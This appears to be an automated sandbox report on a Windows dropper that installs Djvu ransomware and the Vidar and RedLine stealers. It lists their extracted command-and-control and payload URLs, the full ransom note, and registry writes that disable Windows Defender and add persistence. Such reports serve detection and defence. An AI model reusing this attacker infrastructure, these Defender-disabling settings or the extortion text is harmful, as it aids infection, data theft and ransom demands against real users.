djvu | 6bb5f93524d19c19ad102c9577107b7761e1ce94ea2229594fab55fdb98a7e34

Analysis

max time kernel
56s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
18-06-2022 09:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe
Size

136KB
MD5

90c7efe55fff3704de712084227e84a6
SHA1

b60983bec0346c6fdc0569f641e9091b7f201a5b
SHA256

6bb5f93524d19c19ad102c9577107b7761e1ce94ea2229594fab55fdb98a7e34
SHA512

64556f35c8a13cbe7ff7087bc88e19faaac64091bd1f2ad6251651ab0caabc70c2e388420528893193811a387039e1bfb906c4d2e5f2f8e5deb3d8931b78e65f

Score

10^/10

djvu redline vidar 10k#24343 1448 517 8888 937 discovery evasion infostealer persistence ransomware spyware stealer suricata trojan vmprotect

Malware Config

Extracted

Family

djvu

http://abababa.org/test3/get.php

Attributes

extension
.bbii
offline_id
fE1iyGbFRSHwEwVlLZsE3FvHU8UKd1wubsS4CFt1
payload_url
http://rgyui.top/dl/build2.exe
http://abababa.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-KXqYlvxcUy Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0498JIjdm

rsa_pubkey.plain

Extracted

Family

vidar

Version

52.5

Botnet

1448

https://t.me/tg_randomacc

https://indieweb.social/@ronxik333

Attributes

profile_id
1448

Extracted

Family

redline

Botnet

8888

103.89.90.61:12036

Attributes

auth_value
0234674e8f564170371b0b0ab9952ce1

Extracted

Family

vidar

Version

52.6

Botnet

937

https://t.me/tg_dailylessons

https://busshi.moe/@olegf9844xx

Attributes

profile_id
937

Extracted

Family

redline

Botnet

10k#24343

176.124.201.194:42409

Attributes

auth_value
81618697406811e75c92a8fdca6e7f8c

Extracted

Family

vidar

Version

52.6

Botnet

517

https://t.me/tg_dailylessons

https://busshi.moe/@olegf9844xx

Attributes

profile_id
517

Signatures

Detected Djvu ransomware 9 IoCs

Processes:

resource	yara_rule
behavioral2/memory/7104-191-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1880-189-0x00000000023B0000-0x00000000024CB000-memory.dmp	family_djvu
behavioral2/memory/7104-186-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/7104-184-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/7104-246-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/7104-321-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1516-337-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1516-335-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1516-341-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu

Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1388	2748	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8388	2748	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/16312-216-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/38532-290-0x0000000000380000-0x00000000003A0000-memory.dmp	family_redline
behavioral2/memory/884-325-0x0000000000400000-0x0000000002C55000-memory.dmp	family_redline

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata

Vidar Stealer 9 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/5008-182-0x0000000002DD0000-0x0000000002E19000-memory.dmp	family_vidar
behavioral2/memory/5008-204-0x0000000000400000-0x0000000002C72000-memory.dmp	family_vidar
behavioral2/memory/808-229-0x00000000022F0000-0x000000000233B000-memory.dmp	family_vidar
behavioral2/memory/808-233-0x0000000000400000-0x000000000067D000-memory.dmp	family_vidar
behavioral2/memory/808-328-0x0000000000400000-0x000000000067D000-memory.dmp	family_vidar
behavioral2/memory/808-358-0x0000000000400000-0x000000000067D000-memory.dmp	family_vidar
behavioral2/memory/5452-372-0x0000000000400000-0x000000000045A000-memory.dmp	family_vidar
behavioral2/memory/5452-374-0x0000000000400000-0x000000000045A000-memory.dmp	family_vidar
behavioral2/memory/5452-377-0x0000000000400000-0x000000000045A000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 16 IoCs

Processes:

VXECMjWBEdalMFFifD1AAyot.exeRJQq9PYR91jMzYuNNAC5BEQy.exe2lnHl85_3rAuTM4DEaabtgNu.exe_fAvxiU_KqI0dOu5exsFj6Sg.exej_oBPrLZEwFnl0hGt9HyRDSn.exeKTuaEOWn3PZHI7pwGSyrDT5t.exetfjAKCKj2LvIfw6AB9Mo9Tos.exeMbPjSlWybcqWK9SG3yDaGwX7.exetACY59pvu_1gH1Ya10vgQlB1.exeJVB4bakv374Uc2FVLli_0foZ.exexytf5QHkKXSnfzdNbOxOb9kx.exeHBvKLxhnqfgy4N9fMd9NZjix.exeIniXOco96FWIFmOXPvX1fHv2.exeW4ZM9VfbyQb0Knlofi8kzduk.exej_oBPrLZEwFnl0hGt9HyRDSn.exeSOHVFV7sOK9emp74VgoE4i_z.exe

pid	process
4456	VXECMjWBEdalMFFifD1AAyot.exe
3092	RJQq9PYR91jMzYuNNAC5BEQy.exe
4368	2lnHl85_3rAuTM4DEaabtgNu.exe
5008	_fAvxiU_KqI0dOu5exsFj6Sg.exe
1880	j_oBPrLZEwFnl0hGt9HyRDSn.exe
4452	KTuaEOWn3PZHI7pwGSyrDT5t.exe
3276	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
884	MbPjSlWybcqWK9SG3yDaGwX7.exe
3572	tACY59pvu_1gH1Ya10vgQlB1.exe
4092	JVB4bakv374Uc2FVLli_0foZ.exe
4068	xytf5QHkKXSnfzdNbOxOb9kx.exe
2212	HBvKLxhnqfgy4N9fMd9NZjix.exe
808	IniXOco96FWIFmOXPvX1fHv2.exe
3840	W4ZM9VfbyQb0Knlofi8kzduk.exe
7104	j_oBPrLZEwFnl0hGt9HyRDSn.exe
7716	SOHVFV7sOK9emp74VgoE4i_z.exe

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\KTuaEOWn3PZHI7pwGSyrDT5t.exe	vmprotect
C:\Users\Admin\Pictures\Adobe Films\KTuaEOWn3PZHI7pwGSyrDT5t.exe	vmprotect
behavioral2/memory/4452-173-0x0000000000400000-0x000000000090B000-memory.dmp	vmprotect
behavioral2/memory/38412-297-0x0000000140000000-0x0000000140678000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

23132 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

pid	process
23132	icacls.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

SOHVFV7sOK9emp74VgoE4i_z.exeJVB4bakv374Uc2FVLli_0foZ.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	SOHVFV7sOK9emp74VgoE4i_z.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	JVB4bakv374Uc2FVLli_0foZ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	JVB4bakv374Uc2FVLli_0foZ.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	SOHVFV7sOK9emp74VgoE4i_z.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 ipinfo.io
129 ipinfo.io
130 ipinfo.io
206 ip-api.com
211 api.2ip.ua
22 ipinfo.io
83 ipinfo.io
107 api.2ip.ua
108 api.2ip.ua
210 api.2ip.ua
Suspicious use of SetThreadContext 1 IoCs

Processes:

j_oBPrLZEwFnl0hGt9HyRDSn.exe

description pid process target process

PID 1880 set thread context of 7104 1880 j_oBPrLZEwFnl0hGt9HyRDSn.exe j_oBPrLZEwFnl0hGt9HyRDSn.exe

flow	ioc
23	ipinfo.io
129	ipinfo.io
130	ipinfo.io
206	ip-api.com
211	api.2ip.ua
22	ipinfo.io
83	ipinfo.io
107	api.2ip.ua
108	api.2ip.ua
210	api.2ip.ua

description	pid	process	target process
PID 1880 set thread context of 7104	1880	j_oBPrLZEwFnl0hGt9HyRDSn.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe

Drops file in Program Files directory 2 IoCs

Processes:

RJQq9PYR91jMzYuNNAC5BEQy.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	RJQq9PYR91jMzYuNNAC5BEQy.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	RJQq9PYR91jMzYuNNAC5BEQy.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 35 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
13664	3276	WerFault.exe	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
30876	3276	WerFault.exe	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
37472	3276	WerFault.exe	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
38216	3276	WerFault.exe	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
38848	3276	WerFault.exe	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
31872	38364	WerFault.exe	ZnZ7mPcMlWZI8tilZJ8OqGOr.exe
23036	3276	WerFault.exe	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
38628	38364	WerFault.exe	ZnZ7mPcMlWZI8tilZJ8OqGOr.exe
38728	38412	WerFault.exe	45WL9Mscsd5_vOKVEhvWUGRH.exe
3112	3276	WerFault.exe	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
2908	808	WerFault.exe	IniXOco96FWIFmOXPvX1fHv2.exe
1360	38364	WerFault.exe	ZnZ7mPcMlWZI8tilZJ8OqGOr.exe
3824	38364	WerFault.exe	ZnZ7mPcMlWZI8tilZJ8OqGOr.exe
4828	3276	WerFault.exe	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
4440	4580	WerFault.exe	rundll32.exe
5160	4368	WerFault.exe	2lnHl85_3rAuTM4DEaabtgNu.exe
5508	38364	WerFault.exe	ZnZ7mPcMlWZI8tilZJ8OqGOr.exe
5788	3276	WerFault.exe	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
6088	38364	WerFault.exe	ZnZ7mPcMlWZI8tilZJ8OqGOr.exe
6572	38364	WerFault.exe	ZnZ7mPcMlWZI8tilZJ8OqGOr.exe
7284	6676	WerFault.exe	gcleaner.exe
8000	38364	WerFault.exe	ZnZ7mPcMlWZI8tilZJ8OqGOr.exe
8220	6676	WerFault.exe	gcleaner.exe
8824	8440	WerFault.exe	rundll32.exe
8948	38364	WerFault.exe	ZnZ7mPcMlWZI8tilZJ8OqGOr.exe
9068	6676	WerFault.exe	gcleaner.exe
9456	6676	WerFault.exe	gcleaner.exe
9576	9196	WerFault.exe	rmaa1045.exe
9724	6676	WerFault.exe	gcleaner.exe
11064	6676	WerFault.exe	gcleaner.exe
11056	9896	WerFault.exe	InstallUtil.exe
11048	5476	WerFault.exe	msedge.exe
11040	10116	WerFault.exe	chrome.exe
11132	6676	WerFault.exe	gcleaner.exe
11224	9756	WerFault.exe	820D.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

MbPjSlWybcqWK9SG3yDaGwX7.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MbPjSlWybcqWK9SG3yDaGwX7.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MbPjSlWybcqWK9SG3yDaGwX7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MbPjSlWybcqWK9SG3yDaGwX7.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

16284 schtasks.exe
14428 schtasks.exe
5968 schtasks.exe
9768 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

8396 timeout.exe
8936 timeout.exe
5560 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

6596 tasklist.exe
7400 tasklist.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

10768 taskkill.exe
2932 taskkill.exe
3032 taskkill.exe
8780 taskkill.exe
9480 taskkill.exe

pid	process
16284	schtasks.exe
14428	schtasks.exe
5968	schtasks.exe
9768	schtasks.exe

pid	process
8396	timeout.exe
8936	timeout.exe
5560	timeout.exe

pid	process
6596	tasklist.exe
7400	tasklist.exe

pid	process
10768	taskkill.exe
2932	taskkill.exe
3032	taskkill.exe
8780	taskkill.exe
9480	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c0000000100000004000000000800000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

8756 PING.EXE
8744 PING.EXE

pid	process
8756	PING.EXE
8744	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exeVXECMjWBEdalMFFifD1AAyot.exe

pid	process
1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe
1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe
4456	VXECMjWBEdalMFFifD1AAyot.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

2lnHl85_3rAuTM4DEaabtgNu.exe

description pid process

Token: SeDebugPrivilege 4368 2lnHl85_3rAuTM4DEaabtgNu.exe

description	pid	process
Token: SeDebugPrivilege	4368	2lnHl85_3rAuTM4DEaabtgNu.exe

Suspicious use of WriteProcessMemory 61 IoCs

Processes:

6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exej_oBPrLZEwFnl0hGt9HyRDSn.exeJVB4bakv374Uc2FVLli_0foZ.exeSOHVFV7sOK9emp74VgoE4i_z.exe

description	pid	process	target process
PID 1616 wrote to memory of 4456	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	VXECMjWBEdalMFFifD1AAyot.exe
PID 1616 wrote to memory of 4456	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	VXECMjWBEdalMFFifD1AAyot.exe
PID 1616 wrote to memory of 3092	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	RJQq9PYR91jMzYuNNAC5BEQy.exe
PID 1616 wrote to memory of 3092	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	RJQq9PYR91jMzYuNNAC5BEQy.exe
PID 1616 wrote to memory of 3092	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	RJQq9PYR91jMzYuNNAC5BEQy.exe
PID 1616 wrote to memory of 4368	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	2lnHl85_3rAuTM4DEaabtgNu.exe
PID 1616 wrote to memory of 4368	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	2lnHl85_3rAuTM4DEaabtgNu.exe
PID 1616 wrote to memory of 4368	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	2lnHl85_3rAuTM4DEaabtgNu.exe
PID 1616 wrote to memory of 5008	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	_fAvxiU_KqI0dOu5exsFj6Sg.exe
PID 1616 wrote to memory of 5008	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	_fAvxiU_KqI0dOu5exsFj6Sg.exe
PID 1616 wrote to memory of 5008	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	_fAvxiU_KqI0dOu5exsFj6Sg.exe
PID 1616 wrote to memory of 1880	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 1616 wrote to memory of 1880	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 1616 wrote to memory of 1880	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 1616 wrote to memory of 3276	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
